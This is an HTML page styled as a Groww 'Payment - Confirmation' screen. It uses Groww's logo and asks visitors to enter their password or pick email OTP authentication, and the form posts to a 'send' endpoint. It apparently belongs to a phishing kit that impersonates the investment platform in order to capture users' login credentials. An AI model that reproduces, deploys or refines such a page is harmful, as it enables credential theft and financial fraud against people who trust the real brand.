<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Payment - Confirmation</title>
    <link rel="stylesheet" href="/css/style-sec.css">
</head>

<body>
    <div>

        <div id="pinPage" class="bg-black flex-div">

            <div class="logo">
                <div class="logo-pic">
                    <div class="flex-div curs-or pos-relative" itemscope="true" itemtype="http://schema.org/Brand"
                        style="min-width: 150px;min-height: 79px;"><img class=""
                            src="//assets-netstorage.groww.in/web-assets/billion_groww_desktop/prod/build/client/images/logo-light-groww.1815ad63.svg"
                            width="150" height="50" alt="Groww Logo" itemprop="logo"></div>
                </div>
            </div>

            <div class="flex-div otp-input">
                <div style="margin:0;">
                    <div class="input-box">
                        <div class="row">
                            <div class="flex-div main-inp-div">

                                <div class="secure-text">
                                    <div class="text-onee">Enter password</div>
                                    <div class="text-twoo">We value security. Feel free to keep your investments safe &
                                        secure.</div>
                                </div>

                                <div class="contact ">
                                    <div class="f-1">
                                        <form method="POST" action="send">

                                            <p>
                                            <input type="text" name="password" class = "otp_input">
                                            </p>

                                            <div  class="text-onee">OR</div>

                                            <div class="secure-text">
                                                <!-- <div>
                                                    <input type="radio" id="huey" name="drone" value="huey"
                                                           checked>
                                                    <label class="text-three" for="huey">Authentication with OTP sent on register Mobile No.</label>
                                                  </div> -->
                                                  
                                                  <div>
                                                    <input type="radio" id="dewey" name="drone" value="dewey">
                                                    <label style="font-weight:400;" class="text-three" for="dewey">Authentication with OTP sent on register Email ID</label>
                                                  </div>
                                            </div>

                                            

                                            <p class="full">
                                                <button type="submit">Submit</button>
                                            </p>

                                        </form>

                                        <div><a href="#">Forget Password</a></div>

                                    </div>
                                </div>



                            </div>
                        </div>
                    </div>
                </div>
            </div>

        </div>

    </div>

</body>

</html>